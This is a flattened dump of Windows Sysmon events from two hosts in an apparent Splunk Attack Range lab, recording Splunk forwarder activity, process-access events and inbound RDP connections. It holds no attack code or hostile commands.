09:12:40.388{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83CF312C7EA9D59968A0B3536B2B733A,SHA256=F46F887DC0CB7326022B8EE1AF6C620F0D28AA6F03A8513A5D95CAC67DBC2665,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050320Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:40.219{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001050319Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:37.677{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-64491-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050323Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:41.638{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C94533655EDA59DED86954C4D174619,SHA256=A3ABC54CBE2C7DC827A1CBFE76EAE61301462A584B0F0DB17690FDBCC6D92E6F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979035Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:41.545{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3CB16D437CD66A9A0872A5874C649561,SHA256=4937D5202ACA596915DF3317CE07430FF8A5A54B2FB950D677CB4AA056A44938,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050322Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:41.367{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=28F88E0A0799F37AB8A6F8112AEF2668,SHA256=F31A5A2E9ECB850C286AB5A4ABF0AFDB3AC74A00B2E4845079C62D693A28FC34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979036Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:42.560{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ADD16BACE75C51407FC8A73ABD5FD32,SHA256=DBE578324C43D49D23791C92AB2FFD1F28D3565FA2FB8911E97C47C182F33AB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050325Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:42.638{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=432D3EB27500451DEA86F988731E3B4D,SHA256=D43861014C40D4859FE097C72BBBA9BC52C9FDDF52B8C25F61C771CED209EAA5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050324Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:39.907{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de52213-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001050327Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:43.653{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABC50DF9C1FB7CBDE8D417FB9294F2A0,SHA256=93301695EDB6C68CC666CA9D788406225B5DB3F732933F6399D48480F73A3F2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000979039Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:43.776{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=35878A0A0E370201797594A7CE02ECA7,SHA256=AEA5F514A6140B508D010379074B8BD158DB94E17E4F33DFD76B4A055D62ECC1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000979038Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:40.189{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de53032-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000979037Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:43.073{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D2BE7E4B7786871F7316E67CC9983CF6,SHA256=4CA5C1C698103F83C0A498B194DBE70D048D96B5B49D11E1ABDFEF102B5F42EA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050326Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:40.590{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49991-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000979041Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:44.854{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1A12E2963CA07FC0058CCCA8E4C764CA,SHA256=9A09E818961047E876CD4FFB655FDACB6897C3E7681C39604E964B4B2B8A45EA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050337Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:44.686{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B0C-6151-397A-00000000FC01}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050336Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:44.668{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050335Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:44.668{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050334Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:44.668{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050333Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:44.668{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050332Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:44.668{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8B0C-6151-397A-00000000FC01}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050331Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:44.668{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B0C-6151-397A-00000000FC01}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050330Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:44.654{5EBD8912-8B0C-6151-397A-00000000FC01}6812C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050329Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:44.668{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=365859BB192CBD91805339761DAD6F56,SHA256=36FC9730B59E7D1F356A521BC1D6A33D24DC16E941F368D7BBD8C14B1EE0DE45,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050328Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:41.815{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53378-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000979040Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:41.715{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59395-false10.0.1.12-8000- 23542300x8000000000000000979042Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:45.870{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDB2AE26960A1AF5BB615FCF307C77D8,SHA256=1B5C56920017A1656B6D1E1BD94787435D12076D0052D77BF0717FE7830C11F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050347Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:45.690{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C63392470FE50219F22A44692AB56D8F,SHA256=20C87EDDB98612D57F2DF7DD6AC3B20DC18871BFDF6E2EDAC9C5B89DE422AC42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050346Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:45.668{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=87CA561D28685EDC2F3784F3CB9983BE,SHA256=CBB634414438F9597CFE1F2081E3322D523F47A1E05170128DAD2D9DB006A467,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050345Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:45.354{5EBD8912-7F41-614D-3700-00000000FC01}33683388C:\Windows\system32\conhost.exe{5EBD8912-8B0D-6151-3A7A-00000000FC01}1536C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050344Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:45.354{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050343Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:45.354{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050342Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:45.354{5EBD8912-7F2D-614D-0500-00000000FC01}408424C:\Windows\system32\csrss.exe{5EBD8912-8B0D-6151-3A7A-00000000FC01}1536C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050341Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:45.354{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050340Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:45.354{5EBD8912-7F40-614D-2900-00000000FC01}29643516C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8B0D-6151-3A7A-00000000FC01}1536C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050339Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:45.354{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050338Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:45.338{5EBD8912-8B0D-6151-3A7A-00000000FC01}1536C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-7F2E-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5EBD8912-7F40-614D-2900-00000000FC01}2964C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000979045Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:12:46.885{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AB820F358A0A160BDBA6895A65E8004,SHA256=34417A0C65C3DFFED3E3B8721F991CA5E0BA369AA879167203F6DA706BDCB23F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050357Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:12:46.722{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=747C1C54CC18F487E3772EE2C7A8DDC9,SHA256=23165A6AF44E3BE6C1E6D4C7309EFB81713CA9C8CCBE7408B783DFD93D77592F,IMPHASH=00000000000000000000000000000000falsetrue 